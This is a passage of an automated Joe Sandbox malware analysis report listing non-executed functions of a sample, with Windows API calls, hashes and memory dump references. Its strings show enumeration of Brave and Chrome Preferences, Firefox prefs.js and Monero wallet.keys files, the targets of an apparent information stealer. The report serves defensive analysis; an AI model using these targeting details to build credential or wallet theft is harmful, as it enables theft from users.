                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 2084dca4ae77cfa0c65d55eb82e9a0d92bfd117daa2fc9bfd62cbf94f15597a1
                                • Instruction ID: ae4481601485dd5c4276e05d2264f372c8c1979f8807cc34565f8610530bb5e4
                                • Opcode Fuzzy Hash: 2084dca4ae77cfa0c65d55eb82e9a0d92bfd117daa2fc9bfd62cbf94f15597a1
                                • Instruction Fuzzy Hash: A8E012B5A1431297CF1173F4AC0AF2A329CAB1534AF08042AFA09D3347FA2EE8009675

                                Non-executed Functions

                                Function 00DD38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00DD38CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DD38E3
                                • lstrcat.KERNEL32(?,?), ref: 00DD3935
                                • StrCmpCA.SHLWAPI(?,00DE0F70), ref: 00DD3947
                                • StrCmpCA.SHLWAPI(?,00DE0F74), ref: 00DD395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DD3C67
                                • FindClose.KERNEL32(000000FF), ref: 00DD3C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: d5f0222d4f6298ae045e2735d5c38ce614fab08688c8e3b35c5a3359e4ddb056
                                • Instruction ID: 98b468dbb109cd2f39ab16106c42da9fd223b8d0471e3ea24075cce31aaecee1
                                • Opcode Fuzzy Hash: d5f0222d4f6298ae045e2735d5c38ce614fab08688c8e3b35c5a3359e4ddb056
                                • Instruction Fuzzy Hash: DDA130B2A10318ABDB35EBA4DC85FEA7378FB48300F084589A54D97145EB759B84CF72
                                Function 00DCBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00DE0B32,00DE0B2B,00000000,?,?,?,00DE13F4,00DE0B2A), ref: 00DCBEF5
                                • StrCmpCA.SHLWAPI(?,00DE13F8), ref: 00DCBF4D
                                • StrCmpCA.SHLWAPI(?,00DE13FC), ref: 00DCBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCC7BF
                                • FindClose.KERNEL32(000000FF), ref: 00DCC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 6c4e14170615a4c89b573807485dd918a22955d54948cbf938ba22e0c26fc3ce
                                • Instruction ID: 5aa20f1a8c5d9fd873ea734e65554d34c1b8aaa9f17797030f4b25964d9650ef
                                • Opcode Fuzzy Hash: 6c4e14170615a4c89b573807485dd918a22955d54948cbf938ba22e0c26fc3ce
                                • Instruction Fuzzy Hash: 14423272910118ABCB14FB64DD96EED737DEF94300F408559F90A97281EE34AB49CBB2
                                Function 00DD4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00DD492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DD4943
                                • StrCmpCA.SHLWAPI(?,00DE0FDC), ref: 00DD4971
                                • StrCmpCA.SHLWAPI(?,00DE0FE0), ref: 00DD4987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DD4B7D
                                • FindClose.KERNEL32(000000FF), ref: 00DD4B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 5d1651d9031ac8d88c50e51980faba63e0d8c01d191bacf695a7e38a1ed4b0fd
                                • Instruction ID: 6c74a8f6767fc7429b918bfee221752e9d9d406ddbe2c03110952075a99b5b7c
                                • Opcode Fuzzy Hash: 5d1651d9031ac8d88c50e51980faba63e0d8c01d191bacf695a7e38a1ed4b0fd
                                • Instruction Fuzzy Hash: 7C6132B1A00218ABCB31EBA0DC45FEA777CFB48700F048599A54A97145EA75DB89CFB1
                                Function 00DD4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DD4580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD4587
                                • wsprintfA.USER32 ref: 00DD45A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DD45BD
                                • StrCmpCA.SHLWAPI(?,00DE0FC4), ref: 00DD45EB
                                • StrCmpCA.SHLWAPI(?,00DE0FC8), ref: 00DD4601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DD468B
                                • FindClose.KERNEL32(000000FF), ref: 00DD46A0
                                • lstrcat.KERNEL32(?,0162E9B8), ref: 00DD46C5
                                • lstrcat.KERNEL32(?,0162DD40), ref: 00DD46D8
                                • lstrlen.KERNEL32(?), ref: 00DD46E5
                                • lstrlen.KERNEL32(?), ref: 00DD46F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 35e76eb55861e102cf3a7eab7b7c7dac8c28738ce24e6668a4ff95f9e09e0a47
                                • Instruction ID: 97d7fcbffa2062f121eb3fe5265976133c91bfaf3a98daab80ef13950320f135
                                • Opcode Fuzzy Hash: 35e76eb55861e102cf3a7eab7b7c7dac8c28738ce24e6668a4ff95f9e09e0a47
                                • Instruction Fuzzy Hash: 695153B5650218ABC721EB70DC89FED737CEB58300F404589B64A93144EB79DB858FB1
                                Function 00DD3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00DD3EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DD3EDA
                                • StrCmpCA.SHLWAPI(?,00DE0FAC), ref: 00DD3F08
                                • StrCmpCA.SHLWAPI(?,00DE0FB0), ref: 00DD3F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DD406C
                                • FindClose.KERNEL32(000000FF), ref: 00DD4081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: be804ab72987160e8b3875d77149ac22a1db8b4d3cc0dc1fd658326abb6bf306
                                • Instruction ID: f93aca3704cd80cb8a72d12a55391accabea81d6fe143e5b55ba4bd5ec4905ba
                                • Opcode Fuzzy Hash: be804ab72987160e8b3875d77149ac22a1db8b4d3cc0dc1fd658326abb6bf306
                                • Instruction Fuzzy Hash: 3E5131B6900218ABCB25EBB0DC85EEA737CFB44300F048589B65997144DB75DB898FB1
                                Function 00DCED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00DCED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DCED55
                                • StrCmpCA.SHLWAPI(?,00DE1538), ref: 00DCEDAB
                                • StrCmpCA.SHLWAPI(?,00DE153C), ref: 00DCEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCF2AE
                                • FindClose.KERNEL32(000000FF), ref: 00DCF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 50e1e785d7c3279dc90783b800fa125629a32ca9bf49290aa4afcb61de0edd15
                                • Instruction ID: 9219940acbd3bdd0c41823479c0ba4e14091861313259fb4f9c50a35e92dba74
                                • Opcode Fuzzy Hash: 50e1e785d7c3279dc90783b800fa125629a32ca9bf49290aa4afcb61de0edd15
                                • Instruction Fuzzy Hash: 76E1F2719111689ADB65FB64DC92EEE733CEF54300F40819AB40A62192EF306F8ADF75
                                Function 00DCF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DE15B8,00DE0D96), ref: 00DCF71E
                                • StrCmpCA.SHLWAPI(?,00DE15BC), ref: 00DCF76F
                                • StrCmpCA.SHLWAPI(?,00DE15C0), ref: 00DCF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCFAB1
                                • FindClose.KERNEL32(000000FF), ref: 00DCFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 578948fd1d04d5408046a242daff5ab68e445669aaa5b32a1d6b6f7b5ae5a1a3
                                • Instruction ID: 9fa6697630afd5be629f5d352cea9f54725b434160fbf180651556fb976e449a
                                • Opcode Fuzzy Hash: 578948fd1d04d5408046a242daff5ab68e445669aaa5b32a1d6b6f7b5ae5a1a3
                                • Instruction Fuzzy Hash: 3BB122719002559BDB24FB64DC95FEE7379EF54300F4085A9A80A97281EF31AB49CFB2
                                Function 00DC16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DE510C,?,?,?,00DE51B4,?,?,00000000,?,00000000), ref: 00DC1923
                                • StrCmpCA.SHLWAPI(?,00DE525C), ref: 00DC1973
                                • StrCmpCA.SHLWAPI(?,00DE5304), ref: 00DC1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DC1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00DC1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DC1E20
                                • FindClose.KERNEL32(000000FF), ref: 00DC1E32
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 5e70d1ebe07703d7c217f664ffb3f62fa1bdc7e227083379126e2c16e757f2a4
                                • Instruction ID: b779077937ad02a211508f2603657e687219180df00a9760a474a08884c68534
                                • Opcode Fuzzy Hash: 5e70d1ebe07703d7c217f664ffb3f62fa1bdc7e227083379126e2c16e757f2a4
                                • Instruction Fuzzy Hash: 511223719501689BCB15FB64DCA6EEE7378EF54300F40819AB50A62291EF306F89DFB1
                                Function 00DCDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00DE0C2E), ref: 00DCDE5E
                                • StrCmpCA.SHLWAPI(?,00DE14C8), ref: 00DCDEAE
                                • StrCmpCA.SHLWAPI(?,00DE14CC), ref: 00DCDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCE3E0
                                • FindClose.KERNEL32(000000FF), ref: 00DCE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
